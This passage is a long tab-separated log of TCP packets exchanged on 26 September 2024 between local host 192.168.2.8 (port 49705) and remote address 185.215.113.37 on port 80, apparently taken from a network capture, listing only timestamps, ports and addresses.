Sep 26, 2024 02:40:20.468461037 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468466043 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468477964 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468492031 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468611002 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468631029 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468642950 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468643904 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468656063 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468656063 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468668938 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468669891 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468683958 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468683958 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468696117 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468699932 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468713045 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468727112 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468766928 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468779087 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468790054 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468796015 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468806028 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468807936 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468822956 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468836069 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468839884 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468862057 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468868017 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468872070 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468884945 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468888044 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468899012 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468903065 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468914032 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468919039 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468928099 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468931913 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468940973 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.468947887 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468967915 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.468991995 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469010115 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469023943 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469038010 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469048023 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469050884 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469055891 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469063997 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469069958 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469083071 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469084024 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469095945 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469099045 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469110012 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469114065 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469126940 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469131947 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469139099 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469146013 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469151974 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469165087 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469165087 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469177008 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469182968 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469189882 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469196081 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469201088 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469216108 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469216108 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469228029 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469233036 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469244003 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469254971 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469260931 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469268084 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469274044 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469281912 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469294071 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469304085 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469306946 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469321012 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469326019 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469333887 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469340086 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469367027 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469789982 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469803095 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469815969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469820023 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469835997 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469845057 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469907045 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469918966 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469929934 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469938993 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469944954 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:20.469952106 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469964981 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:20.469979048 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.532881021 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.532911062 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.532924891 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.532937050 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.532943010 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.532949924 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.532963037 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.532978058 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.532980919 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.532999992 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533020973 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533031940 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533045053 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533050060 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533061028 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533071041 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533076048 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533087969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533097982 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533102989 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533113956 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533117056 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533145905 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533163071 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533168077 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533189058 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533205032 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533216953 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533292055 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533305883 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533318043 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533327103 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533330917 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533341885 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533344984 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533359051 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533363104 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533371925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533384085 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533390999 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533396959 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533407927 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533418894 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533432961 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533436060 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533444881 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.533457041 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.533480883 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534003019 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534017086 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534029007 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534038067 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534040928 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534054041 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534063101 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534065962 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534080029 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534089088 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534091949 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534104109 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534105062 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534118891 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534127951 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534131050 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534145117 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534153938 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534158945 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534168959 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534173965 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534188032 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534194946 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534202099 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534219980 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534223080 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534235001 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534240007 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534261942 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534279108 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.534946918 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534960985 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534972906 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534985065 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534996986 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.534996033 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.535011053 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535022974 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535065889 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535073042 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535084009 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.535084009 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.535084009 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.535089970 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535098076 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535104036 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535109997 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535115004 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535120964 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535126925 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535135031 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535142899 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535149097 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.535156012 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535164118 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535170078 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535175085 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535181046 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535186052 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535192013 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535197973 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535202026 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.535204887 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535212994 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535218000 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535224915 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535232067 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.535267115 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.535306931 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.535381079 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536072969 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536089897 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536102057 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536115885 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536118984 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536130905 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536135912 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536144018 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536155939 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536160946 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536169052 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536179066 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536183119 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536201000 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536202908 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536226034 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536227942 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536243916 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536247969 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536257029 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536263943 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536272049 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536282063 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536290884 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536298037 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536308050 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536313057 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536322117 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536329985 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536338091 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536345959 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536353111 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536362886 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536367893 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536379099 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536384106 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536395073 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536395073 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536410093 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536412001 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536423922 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536429882 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536439896 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536446095 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536461115 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536464930 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536477089 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536479950 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536494017 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536499977 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536506891 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536514044 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536520958 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536530018 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536534071 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536546946 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536549091 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536562920 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536566973 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536580086 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.536587954 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.536613941 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537112951 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537127972 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537153006 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537174940 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537272930 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537286997 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537297010 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537307024 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537309885 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537323952 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537328005 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537339926 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537341118 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537353992 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537362099 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537368059 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537380934 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537388086 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537395000 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537408113 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537415028 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537430048 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537431955 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537445068 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537452936 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537457943 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537470102 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537471056 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537487984 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537494898 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537501097 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537513971 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537518024 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537527084 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537539959 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537539959 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537553072 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537565947 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537570953 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537579060 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537586927 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537592888 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537600994 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537606001 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537619114 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537631035 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537632942 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537648916 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537653923 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537663937 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537672997 CEST	49705	80	192.168.2.8	185.215.113.37
Sep 26, 2024 02:40:21.537678003 CEST	80	49705	185.215.113.37	192.168.2.8
Sep 26, 2024 02:40:21.537697077 CEST	49705	80	192.168.2.8	185.215.113.37
